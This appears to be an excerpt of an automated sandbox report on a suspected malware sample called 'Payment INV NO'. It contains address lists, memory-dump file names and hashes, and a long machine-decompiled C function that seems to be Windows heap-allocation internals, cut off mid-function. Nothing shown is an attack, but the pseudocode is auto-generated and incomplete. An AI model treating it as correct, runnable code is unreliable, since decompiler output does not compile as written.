                                                          0x01793e31
                                                          0x01793e31
                                                          0x01793d94
                                                          0x00000000
                                                          0x01793d94
                                                          0x01793c91
                                                          0x01793c91
                                                          0x01793c94
                                                          0x01793d23
                                                          0x01793d23
                                                          0x01793d27
                                                          0x01793e16
                                                          0x01793e16
                                                          0x01793d2d
                                                          0x01793d31
                                                          0x017f01fe
                                                          0x017f01fe
                                                          0x01793d84
                                                          0x01793d84
                                                          0x00000000
                                                          0x01793d84
                                                          0x01793d3d
                                                          0x01793d44
                                                          0x01793d45
                                                          0x01793d48
                                                          0x01793d4f
                                                          0x017f01de
                                                          0x017f01de
                                                          0x017f01e2
                                                          0x00000000
                                                          0x00000000
                                                          0x017f01ea
                                                          0x017f01ea
                                                          0x017f01eb
                                                          0x017f01f9
                                                          0x00000000
                                                          0x017f01f9
                                                          0x01793d55
                                                          0x01793d5c
                                                          0x00000000
                                                          0x00000000
                                                          0x01793d62
                                                          0x01793d66
                                                          0x01793e55
                                                          0x01793e5e
                                                          0x01793e60
                                                          0x00000000
                                                          0x00000000
                                                          0x01793d75
                                                          0x01793d75
                                                          0x01793d79
                                                          0x01793d7b
                                                          0x01793d7e
                                                          0x017f01c7
                                                          0x017f01ca
                                                          0x017f01cd
                                                          0x017f01d0
                                                          0x017f01d3
                                                          0x017f01d6
                                                          0x017f01d6
                                                          0x01793d7e
                                                          0x00000000
                                                          0x01793d79
                                                          0x01793d6c
                                                          0x01793d72
                                                          0x00000000
                                                          0x01793d72
                                                          0x01793c9d
                                                          0x01793ca0
                                                          0x01793cab
                                                          0x01793cae
                                                          0x01793cb1
                                                          0x01793cb5
                                                          0x01793cb7
                                                          0x01793cd2
                                                          0x01793cdb
                                                          0x01793cdb
                                                          0x01793cde
                                                          0x01793ce1
                                                          0x01793ce3
                                                          0x017f00fa
                                                          0x017f00fd
                                                          0x00000000
                                                          0x00000000
                                                          0x017f0103
                                                          0x017f0107
                                                          0x017f0113
                                                          0x017f0125
                                                          0x017f012b
                                                          0x017f012e
                                                          0x017f0131
                                                          0x00000000
                                                          0x017f0131
                                                          0x017f0109
                                                          0x017f010d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01793ce9
                                                          0x01793ce9
                                                          0x01793ce9
                                                          0x01793cee
                                                          0x017f0139
                                                          0x017f0149
                                                          0x017f014f
                                                          0x017f014f
                                                          0x01793cf4
                                                          0x01793cf9
                                                          0x01793cfb
                                                          0x017f0160
                                                          0x01793d01
                                                          0x01793d01
                                                          0x01793d01
                                                          0x01793d06
                                                          0x01793d09
                                                          0x017f0184
                                                          0x017f0184
                                                          0x01793d0f
                                                          0x01793d16
                                                          0x01793d1e
                                                          0x00000000
                                                          0x01793d1e
                                                          0x01793ce3
                                                          0x017f00ca
                                                          0x01793ddd
                                                          0x01793de0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01793de2
                                                          0x01793c08
                                                          0x01793c0b
                                                          0x01793dc9
                                                          0x01793dcb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01793dcb
                                                          0x00000000
                                                          0x01793c0b

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dcb377a88f04e583ade82cdb21f59e4660db6bc419d70aca39e344aef8395863
                                                          • Instruction ID: 9a44e98a9001ccbf1540672a07da21923fe749516d659470f5675b2a69c98b7c
                                                          • Opcode Fuzzy Hash: dcb377a88f04e583ade82cdb21f59e4660db6bc419d70aca39e344aef8395863
                                                          • Instruction Fuzzy Hash: 2EE1EC70E01648DFCF25CFA9D984AAEFBF2BF48300F24456AE546A7261D730A985CF10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017B5600 Relevance: 6.2, Strings: 3, Instructions: 2418COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 93%
                                                          			E017B5600(signed char __ecx, signed int __edx, signed int _a4, unsigned int _a8, intOrPtr* _a12, signed char* _a16) {
				signed char _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				char _v53;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char _v69;
				char _v70;
				signed char _v71;
				char _v72;
				char _v73;
				signed int _v80;
				signed int _v88;
				signed short _v92;
				signed char _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v109;
				char _v110;
				signed int _v111;
				char _v112;
				signed char _v116;
				signed int _v120;
				signed char _v128;
				signed short _v132;
				signed short _v134;
				signed short _v136;
				signed short _v138;
				signed int _v144;
				signed char _v148;
				signed char _v152;
				signed short _v156;
				signed int _v160;
				signed short _v164;
				signed short _v166;
				signed int _v172;
				signed char _v176;
				signed char _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed char _v200;
				char _v204;
				signed int _v206;
				signed char _v212;
				intOrPtr _v216;
				signed int _v220;
				unsigned int* _v224;
				intOrPtr _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed char _v248;
				unsigned int* _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed char _v276;
				signed char _v280;
				intOrPtr _v284;
				signed int* _v288;
				signed int _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed short _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				intOrPtr _v340;
				signed char _v344;
				signed char _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				unsigned int _v372;
				unsigned int _v380;
				unsigned int _v388;
				unsigned int _v396;
				unsigned int _v404;
				unsigned int _v412;
				unsigned int _v420;
				unsigned int _v428;
				unsigned int _v436;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t1068;
				signed char _t1072;
				signed int _t1073;
				intOrPtr _t1075;
				signed int _t1078;
				char* _t1079;
				signed int _t1097;
				signed char* _t1100;
				intOrPtr _t1101;
				signed int _t1102;
				signed char* _t1105;
				intOrPtr _t1106;
				signed int _t1107;
				signed char* _t1110;
				signed char* _t1112;
				signed int _t1120;
				void* _t1127;
				signed char* _t1137;
				intOrPtr* _t1145;
				signed int _t1147;
				intOrPtr _t1148;
				void* _t1149;
				signed int _t1151;
				signed char _t1153;
				signed int _t1158;
				signed int _t1159;
				signed char _t1179;
				signed char _t1180;
				unsigned int _t1182;
				signed char _t1192;
				signed char _t1193;
				char _t1205;
				signed char _t1209;
				signed short _t1211;
				void* _t1212;
				signed int _t1217;
				signed int _t1218;
				signed char _t1219;
				signed int _t1221;
				intOrPtr* _t1227;
				intOrPtr* _t1228;
				signed int _t1235;
				signed int _t1236;
				intOrPtr* _t1244;
				intOrPtr* _t1246;
				signed int _t1249;
				signed int _t1253;
				signed int _t1255;
				intOrPtr _t1261;
				signed int _t1267;
				signed int _t1269;
				intOrPtr* _t1281;
				intOrPtr* _t1282;
				signed int _t1285;
				signed int* _t1289;
				signed int* _t1291;
				intOrPtr _t1294;
				signed int _t1295;
				signed int _t1301;
				signed int* _t1302;
				signed int _t1303;
				intOrPtr _t1308;
				signed short _t1309;
				intOrPtr _t1315;
				signed int _t1316;
				intOrPtr _t1318;
				signed int* _t1319;
				signed int _t1320;
				signed int* _t1323;
				signed int _t1324;
				unsigned int* _t1333;
				signed int _t1336;
				signed int _t1338;
				signed int _t1341;
				signed int _t1347;
				signed int* _t1348;
				signed int _t1349;
				signed short _t1352;
				signed short _t1358;
				signed short _t1364;
				signed int _t1373;
				intOrPtr _t1379;
				intOrPtr _t1384;
				intOrPtr* _t1392;
				signed int _t1393;
				signed int _t1396;
				signed int _t1397;
				intOrPtr _t1399;
				signed int _t1401;
				signed char _t1403;
				signed int _t1405;
				signed int _t1406;
				intOrPtr _t1408;
				signed int* _t1410;
				signed int _t1411;
				signed short _t1414;
				signed int* _t1424;
				signed int _t1425;
				signed int* _t1428;
				signed int _t1429;
				signed int _t1432;
				signed int _t1434;
				signed int _t1438;
				signed short _t1440;
				signed short _t1447;
				signed short _t1453;
				intOrPtr* _t1459;
				signed char _t1460;
				void* _t1461;
				signed int _t1465;
				signed int _t1466;
				intOrPtr _t1469;
				signed int _t1471;
				signed char _t1473;
				signed int _t1475;
				signed int _t1476;
				signed char _t1477;
				intOrPtr _t1479;
				signed int* _t1481;
				signed int _t1482;
				signed short _t1485;
				signed int _t1496;
				signed int _t1504;
				signed int _t1506;
				signed int _t1518;
				unsigned int _t1521;
				intOrPtr _t1522;
				signed int _t1523;
				signed int _t1524;
				signed int _t1525;
				signed char _t1526;
				signed short _t1527;
				signed int _t1529;
				unsigned int _t1535;
				signed int _t1538;
				signed short _t1539;
				signed int _t1559;
				signed int _t1564;
				signed char _t1565;
				signed char _t1566;
				signed char _t1567;
				signed char _t1569;
				signed int _t1571;
				signed char _t1576;
				signed short* _t1577;
				signed char _t1579;
				intOrPtr* _t1581;
				signed int _t1583;
				intOrPtr* _t1586;
				intOrPtr _t1590;
				signed int _t1594;
				signed char _t1599;
				intOrPtr* _t1601;
				signed int _t1604;
				signed int _t1605;
				signed int _t1606;
				signed int _t1608;
				signed char _t1614;
				signed short _t1617;
				signed int _t1619;
				signed short _t1620;
				signed int _t1622;
				unsigned int _t1628;
				signed short _t1632;
				signed int _t1634;
				signed char _t1638;
				signed char _t1643;
				signed char _t1648;
				intOrPtr _t1651;
				signed int _t1654;
				signed int _t1656;
				signed int _t1657;
				signed char _t1658;
				signed char _t1660;
				signed char _t1668;
				signed short _t1671;
				intOrPtr _t1673;
				signed short _t1674;
				intOrPtr _t1676;
				signed int _t1678;
				signed int _t1681;
				signed int _t1682;
				signed int _t1686;
				signed short _t1689;
				signed int _t1691;
				signed char _t1695;
				signed char _t1700;
				signed char _t1705;
				signed int _t1707;
				intOrPtr _t1708;
				signed int _t1709;
				signed int _t1710;
				signed char _t1712;
				signed char _t1719;
				signed int* _t1723;
				signed int _t1724;
				signed int _t1725;
				unsigned int _t1728;
				signed int _t1729;
				signed int _t1730;
				signed char* _t1734;
				signed int _t1736;
				intOrPtr* _t1738;
				signed int _t1740;
				signed int _t1743;
				unsigned int _t1744;
				intOrPtr _t1753;
				signed char _t1754;
				signed short* _t1755;
				signed short* _t1757;
				unsigned int _t1760;
				intOrPtr _t1763;
				signed int _t1765;
				signed short _t1766;
				signed short _t1768;
				void* _t1769;
				signed int _t1771;
				signed int _t1773;
				signed int _t1775;
				unsigned int _t1781;
				signed int _t1784;
				signed int _t1785;
				signed int _t1787;
				signed int _t1789;
				unsigned int _t1791;
				unsigned int _t1795;
				unsigned int _t1799;
				signed int _t1802;
				intOrPtr* _t1803;
				signed short* _t1805;
				signed int _t1807;
				intOrPtr _t1809;
				signed short _t1811;
				signed short _t1813;
				intOrPtr _t1814;
				signed char _t1820;
				void* _t1821;
				signed int _t1825;
				signed char _t1829;
				unsigned int _t1831;
				unsigned int* _t1836;
				unsigned int _t1838;
				unsigned int _t1842;
				unsigned int _t1846;
				signed int _t1852;
				signed int _t1858;
				unsigned int _t1861;
				signed int _t1866;
				intOrPtr _t1868;
				signed char _t1871;
				void* _t1873;
				signed int _t1876;
				signed int _t1877;
				signed int _t1880;
				signed char _t1881;
				signed int _t1882;
				signed int _t1883;
				signed short _t1885;
				signed short* _t1886;
				signed char _t1887;
				signed char _t1888;
				signed int* _t1889;
				intOrPtr _t1890;
				signed int _t1892;
				intOrPtr* _t1893;
				signed int _t1894;
				signed int _t1895;
				signed int _t1896;
				signed int _t1897;
				signed int _t1900;
				signed int _t1904;
				signed int _t1905;
				signed int _t1906;
				intOrPtr _t1907;
				signed int _t1908;
				signed int _t1910;
				signed int _t1911;
				signed int _t1912;
				unsigned int _t1916;
				signed int _t1917;
				void* _t1921;
				intOrPtr _t1922;
				intOrPtr _t1923;
				signed int _t1924;
				signed int _t1926;
				signed int _t1927;
				signed int _t1928;
				unsigned int _t1931;
				signed int _t1932;
				signed int* _t1933;
				intOrPtr _t1934;
				signed int _t1935;
				void* _t1936;
				void* _t1937;
				void* _t1940;
				void* _t1941;
				signed int _t1946;
				void* _t1952;

				_t1725 = __edx;
				_t1540 = __ecx;
				_push(0xfffffffe);
				_push(0x186fc88);
				_push(0x17e17f0);
				_push( *[fs:0x0]);
				_t1937 = _t1936 - 0x1a0;
				_push(_t1873);
				_t1068 =  *0x188d360;
				_v12 = _v12 ^ _t1068;
				_push(_t1068 ^ _t1935);
				 *[fs:0x0] =  &_v20;
				_v96 = __edx;
				_t1871 = __ecx;
				_v280 = __ecx;
				_v196 = 0;
				_v104 = 1;
				_v53 = 0;
				_v80 = 0;
				_v60 = 0;
				_v180 = 0;
				_t1518 = _a8 >> 3;
				if((__edx & 0x7d010f60) != 0 || _a4 >= 0x80000000) {
					_v104 = 0;
					 *_a16 = 4;
					_t1072 = _a4;
					__eflags = _t1072 - 0x7fffffff;
					if(_t1072 > 0x7fffffff) {
						_t1073 = 0;
						goto L157;
					}
					__eflags = _t1725 & 0x61000000;
					if((_t1725 & 0x61000000) != 0) {
						__eflags = _t1725 & 0x10000000;
						if(__eflags != 0) {
							goto L287;
						}
						_push(_t1072);
						_t1073 = L01852D82(_t1518, _t1540, _t1725, _t1871, _t1873, __eflags);
						goto L157;
					}
					L287:
					__eflags = _t1072;
					if(_t1072 == 0) {
						_t1072 = 1;
					}
					_t1728 =  *((intOrPtr*)(_t1871 + 0x94)) + _t1072 &  *(_t1871 + 0x98);
					__eflags = _t1728 - 0x10;
					if(_t1728 < 0x10) {
						_t1728 = 0x10;
					}
					_a8 = _t1728;
					_t1074 = _v96;
					_t1546 = _t1074 >> 0x00000004 & 0xffffffe1 | 0x00000001;
					_v64 = _t1546;
					__eflags = _t1074 & 0x3c000100;
					if((_t1074 & 0x3c000100) == 0) {
						__eflags =  *(_t1871 + 0xbc);
						if( *(_t1871 + 0xbc) == 0) {
							goto L291;
						}
						goto L290;
					} else {
						L290:
						_t1546 = _t1546 | 0x00000002;
						_v64 = _t1546;
						_t1728 = _t1728 + 8;
						__eflags = _t1728;
						_a8 = _t1728;
						L291:
						_t1729 = _t1728 >> 3;
						_v52 = _t1729;
						goto L4;
					}
				} else {
					_t1546 = 1;
					_v64 = 1;
					_t1729 = _t1518;
					_v52 = _t1729;
					if(_t1729 < 2) {
						_a8 = _a8 + 8;
						_t1729 = 2;
						_v52 = 2;
					}
					 *_a16 = 3;
					_t1074 = _v96;
					L4:
					_t1876 = _t1074 & 0x00800000;
					if(_t1876 != 0) {
						_t1075 =  *[fs:0x30];
						__eflags =  *(_t1075 + 0x68) & 0x00000800;
						_t1074 = _v96;
						if(( *(_t1075 + 0x68) & 0x00000800) == 0) {
							_t1546 = _t1546 | 0x00000008;
							_v64 = _t1546;
						}
					}
					_v8 = 0;
					_t1946 = _t1074 & 0x00000001;
					if(_t1946 != 0) {
						L11:
						if(_t1729 >  *((intOrPtr*)(_t1871 + 0x5c))) {
							__eflags =  *(_t1871 + 0x40) & 0x00000002;
							if(( *(_t1871 + 0x40) & 0x00000002) == 0) {
								_v148 = 0xc0000023;
								L363:
								_v80 = 0;
								goto L153;
							}
							_t1521 = _a8 + 0x18;
							_a8 = _t1521;
							_a8 = _t1521;
							_t1880 = (E017C1164(_t1546) & 0x0000000f) << 0xc;
							_v352 = _t1880;
							_v200 = 0;
							_v204 = _a8 + 0x1000 + _t1880;
							_t1732 = 1;
							_t1546 = _t1871;
							_t1518 = E017C0678(_t1871, 1);
							_v356 = _t1518;
							_push(_t1518);
							_push(0x2000);
							_push( &_v204);
							_push(0);
							_push( &_v200);
							_push(0xffffffff);
							_t1074 = E017D9660();
							_v148 = _t1074;
							__eflags = _t1074;
							if(_t1074 < 0) {
								goto L153;
							}
							_v60 = _v200 + _t1880;
							_push(_t1518);
							_push(0x1000);
							_push( &_a8);
							_push(0);
							_push( &_v60);
							_push(0xffffffff);
							_t1074 = E017D9660();
							_v148 = _t1074;
							__eflags = _t1074;
							if(_t1074 < 0) {
								_v60 = 0;
								 *((intOrPtr*)(_t1871 + 0x214)) =  *((intOrPtr*)(_t1871 + 0x214)) + 1;
								goto L363;
							}
							 *((short*)(_v60 + 0x18)) = _a8 - _a4;
							 *(_v60 + 0x1a) = _v64 | 0x00000002;
							 *(_v60 + 0x10) = _a8;
							 *((intOrPtr*)(_v60 + 0x14)) = _v204;
							 *((char*)(_v60 + 0x1f)) = 4;
							 *((intOrPtr*)(_t1871 + 0x1f0)) =  *((intOrPtr*)(_t1871 + 0x1f0)) + _a8;
							_t1097 = E017B7D50();
							__eflags = _t1097;
							if(_t1097 != 0) {
								_t1100 =  *( *[fs:0x30] + 0x50) + 0x226;
							} else {
								_t1100 = 0x7ffe0380;
							}
							__eflags =  *_t1100;
							if( *_t1100 != 0) {
								_t1101 =  *[fs:0x30];
								__eflags =  *(_t1101 + 0x240) & 0x00000001;
								if(( *(_t1101 + 0x240) & 0x00000001) != 0) {
									_t1732 = _v60;
									L0185138A(_t1518, _t1871, _v60, _a8, 9);
								}
							}
							_t1102 = E017B7D50();
							__eflags = _t1102;
							if(_t1102 != 0) {
								_t1105 =  *( *[fs:0x30] + 0x50) + 0x226;
							} else {
								_t1105 = 0x7ffe0380;
							}
							__eflags =  *_t1105;
							if( *_t1105 != 0) {
								_t1106 =  *[fs:0x30];
								__eflags =  *(_t1106 + 0x240) & 0x00000001;
								if(( *(_t1106 + 0x240) & 0x00000001) != 0) {
									__eflags = E017B7D50();
									if(__eflags == 0) {
										_t1137 = 0x7ffe0380;
									} else {
										_t1137 =  *( *[fs:0x30] + 0x50) + 0x226;
									}
									_t1732 = _v60;
									L01851582(_t1518, _t1871, _v60, __eflags, _a8,  *(_t1871 + 0x74) << 3,  *_t1137 & 0x000000ff);
								}
							}
							_t1107 = E017B7D50();
							__eflags = _t1107;
							if(_t1107 != 0) {
								_t1110 =  *( *[fs:0x30] + 0x50) + 0x230;
							} else {
								_t1110 = 0x7ffe038a;
							}
							__eflags =  *_t1110;
							if( *_t1110 != 0) {
								__eflags = E017B7D50();
								if(__eflags == 0) {
									_t1112 = 0x7ffe038a;
								} else {
									_t1112 =  *( *[fs:0x30] + 0x50) + 0x230;
								}
								_t1732 = _v60;
								L01851582(_t1518, _t1871, _v60, __eflags, _a8,  *(_t1871 + 0x74) << 3,  *_t1112 & 0x000000ff);
							}
							__eflags =  *(_t1871 + 0x40) & 0x08000000;
							if(( *(_t1871 + 0x40) & 0x08000000) != 0) {
								_t1559 = E017C16C7(1, _t1732) & 0x0000ffff;
								_v206 = _t1559;
								 *(_v60 + 8) = _t1559;
							}
							_t1120 =  *( *[fs:0x30] + 0x68);
							_v360 = _t1120;
							__eflags = _t1120 & 0x00000800;
							if((_t1120 & 0x00000800) != 0) {
								 *((short*)(_v60 + 0xa)) = L0183E9F0(_t1871, _v96 >> 0x00000012 & 0x000000ff, 0,  *(_v60 + 0x10) >> 3, 1);
							}
							_t1546 = _v60;
							__eflags =  *(_t1871 + 0x4c);
							if( *(_t1871 + 0x4c) != 0) {
								 *(_t1546 + 0x1b) =  *(_t1546 + 0x1a) ^  *(_t1546 + 0x19) ^  *(_t1546 + 0x18);
								_t737 = _t1546 + 0x18;
								 *_t737 =  *(_t1546 + 0x18) ^  *(_t1871 + 0x50);
								__eflags =  *_t737;
								_t1546 = _v60;
							}
							_t1127 = _t1871 + 0x9c;
							_t1734 =  *(_t1127 + 4);
							_t1881 =  *_t1734;
							__eflags = _t1881 - _t1127;
							if(_t1881 != _t1127) {
								_push(_t1546);
								_t1546 = 0xd;
								L0185A80D(0, _t1127, 0, _t1881);
							} else {
								 *_t1546 = _t1127;
								 *(_t1546 + 4) = _t1734;
								 *_t1734 = _t1546;
								 *(_t1127 + 4) = _t1546;
							}
							_t1074 = _v60 + 0x20;
							_v80 = _v60 + 0x20;
							goto L153;
						}
						if(_t1876 != 0) {
							L21:
							_t1145 = _a12;
							if(_t1145 == 0) {
								L23:
								_v228 = _t1871 + 0xc0;
								_t1564 =  *(_t1871 + 0xb4);
								_v36 = _t1564;
								while(1) {
									_t1522 =  *((intOrPtr*)(_t1564 + 4));
									if(_t1729 < _t1522) {
										_t1523 = _t1729;
										goto L26;
									}
									_t1147 =  *_t1564;
									__eflags = _t1147;
									if(_t1147 == 0) {
										_t1523 = _t1522 - 1;
										while(1) {
											L26:
											_v144 = _t1523;
											_t1524 = _t1523 -  *(_t1564 + 0x14);
											_t1882 = 0;
											_t1736 =  *(_t1564 + 0x18);
											_v40 = _t1736;
											_t1148 =  *((intOrPtr*)(_t1736 + 4));
											if(_t1736 == _t1148) {
												goto L311;
											}
											_t1424 = _t1148 + 0xfffffff8;
											_v32 = _t1424;
											_t1425 =  *_t1424;
											_v380 = _t1425;
											_t1671 = _t1425 & 0x0000ffff;
											if( *(_t1871 + 0x4c) != 0) {
												_t1846 =  *(_t1871 + 0x50) ^ _t1425;
												_v380 = _t1846;
												_t1453 = _t1846 & 0x0000ffff;
												_v44 = _t1453;
												_v68 = _t1453 & 0x0000ffff;
												_t1705 = _t1846 >> 0x00000010 ^ _t1846 >> 0x00000008 ^ _t1846;
												if(_t1846 >> 0x18 != _t1705) {
													_push(_t1705);
													L0185A80D(_t1871, _v32, 0, 0);
													_t1671 = _v44 & 0x0000ffff;
												} else {
													_t1671 = _v68;
												}
												_t1736 = _v40;
											}
											_t1673 = _v52 - (_t1671 & 0x0000ffff);
											_v300 = _t1673;
											if(_t1673 > 0) {
												_t1882 = _t1736;
												goto L48;
											} else {
												_t1428 =  *_t1736 + 0xfffffff8;
												_v32 = _t1428;
												_t1429 =  *_t1428;
												_v388 = _t1429;
												_t1674 = _t1429 & 0x0000ffff;
												if( *(_t1871 + 0x4c) != _t1882) {
													_t1842 =  *(_t1871 + 0x50) ^ _t1429;
													_v388 = _t1842;
													_t1447 = _t1842 & 0x0000ffff;
													_v44 = _t1447;
													_v68 = _t1447 & 0x0000ffff;
													_t1700 = _t1842 >> 0x00000010 ^ _t1842 >> 0x00000008 ^ _t1842;
													if(_t1842 >> 0x18 != _t1700) {
														_push(_t1700);
														L0185A80D(_t1871, _v32, 0, 0);
														_t1674 = _v44 & 0x0000ffff;
													} else {
														_t1674 = _v68;
													}
													_t1736 = _v40;
												}
												_t1676 = _v52 - (_t1674 & 0x0000ffff);
												_v304 = _t1676;
												_t1564 = _v36;
												if(_t1676 <= 0) {
													_t1882 =  *_t1736;
													goto L49;
												} else {
													if( *_t1564 != _t1882 || _v144 !=  *((intOrPtr*)(_t1564 + 4)) - 1) {
														_t1432 = _t1524 >> 5;
														_t1921 = ( *((intOrPtr*)(_t1564 + 4)) -  *(_t1564 + 0x14) >> 5) - 1;
														_t1836 =  *((intOrPtr*)(_t1564 + 0x1c)) + _t1432 * 4;
														_v32 = _t1524 & 0x0000001f;
														_t1535 =  !((1 << _v32) - 1) &  *_t1836;
														while(1) {
															_v224 = _t1836;
															_v184 = _t1432;
															if(_t1535 != 0) {
																break;
															}
															if(_t1432 > _t1921) {
																__eflags = _t1535;
																if(_t1535 != 0) {
																	break;
																}
																_t1564 = _v36;
																goto L167;
															} else {
																_t1836 =  &(_t1836[1]);
																_t1535 =  *_t1836;
																_t1432 = _t1432 + 1;
																continue;
															}
														}
														__eflags = _t1535;
														if(_t1535 != 0) {
															_t1678 = _t1535 & 0x000000ff;
															__eflags = _t1535;
															if(_t1535 == 0) {
																_t1681 = ( *((_t1535 >> 0x00000008 & 0x000000ff) + 0x17784d0) & 0x000000ff) + 8;
															} else {
																_t1681 =  *(_t1678 + 0x17784d0) & 0x000000ff;
															}
														} else {
															_t1686 = _t1535 >> 0x00000010 & 0x000000ff;
															__eflags = _t1686;
															if(_t1686 != 0) {
																_t1681 = ( *(_t1686 + 0x17784d0) & 0x000000ff) + 0x10;
															} else {
																_t1681 = ( *((_t1535 >> 0x18) + 0x17784d0) & 0x000000ff) + 0x18;
																__eflags = _t1681;
															}
														}
														_t1434 = (_t1432 << 5) + _t1681;
														_v184 = _t1434;
														_t1682 = _v36;
														__eflags =  *(_t1682 + 8);
														if( *(_t1682 + 8) != 0) {
															_t1434 = _t1434 + _t1434;
														}
														_t1882 =  *( *((intOrPtr*)(_t1682 + 0x20)) + _t1434 * 4);
														goto L48;
													} else {
														__eflags =  *((intOrPtr*)(_t1564 + 8)) - _t1882;
														if( *((intOrPtr*)(_t1564 + 8)) != _t1882) {
															_t1524 = _t1524 + _t1524;
														}
														_t1538 =  *( *((intOrPtr*)(_t1564 + 0x20)) + _t1524 * 4);
														while(1) {
															__eflags = _t1736 - _t1538;
															if(_t1736 == _t1538) {
																break;
															}
															_t1438 =  *(_t1538 - 8);
															_v396 = _t1438;
															_t1689 = _t1438 & 0x0000ffff;
															__eflags =  *(_t1871 + 0x4c) - _t1882;
															if( *(_t1871 + 0x4c) != _t1882) {
																_t1838 =  *(_t1871 + 0x50) ^ _t1438;
																_v396 = _t1838;
																_t1440 = _t1838 & 0x0000ffff;
																_v32 = _t1440;
																_v44 = _t1440 & 0x0000ffff;
																_t1695 = _t1838 >> 0x00000010 ^ _t1838 >> 0x00000008 ^ _t1838;
																__eflags = _t1838 >> 0x18 - _t1695;
																if(_t1838 >> 0x18 != _t1695) {
																	_push(_t1695);
																	L0185A80D(_t1871, _t1538 - 8, 0, 0);
																	_t1689 = _v32 & 0x0000ffff;
																} else {
																	_t1689 = _v44;
																}
																_t1736 = _v40;
															}
															_t1691 = _v52 - (_t1689 & 0x0000ffff);
															_v308 = _t1691;
															__eflags = _t1691;
															if(_t1691 > 0) {
																_t1538 =  *_t1538;
																continue;
															} else {
																_t1882 = _t1538;
																break;
															}
														}
														L48:
														_t1564 = _v36;
														L49:
														__eflags = _t1882;
														if(_t1882 == 0) {
															L167:
															_t1564 =  *_t1564;
															_v36 = _t1564;
															_t1523 =  *(_t1564 + 0x14);
															continue;
														}
														_v312 = _t1882;
														__eflags = _v228 - _t1882;
														if(_v228 == _t1882) {
															L248:
															_t1546 = _t1871;
															_t1518 = E017BB236(_t1871, _a8);
															_v100 = _t1518;
															__eflags = _t1518;
															if(_t1518 == 0) {
																_v148 = 0xc0000017;
																goto L363;
															}
															_t540 = _t1518 + 8; // 0x8
															_t1738 = _t540;
															_t1883 =  *_t1738;
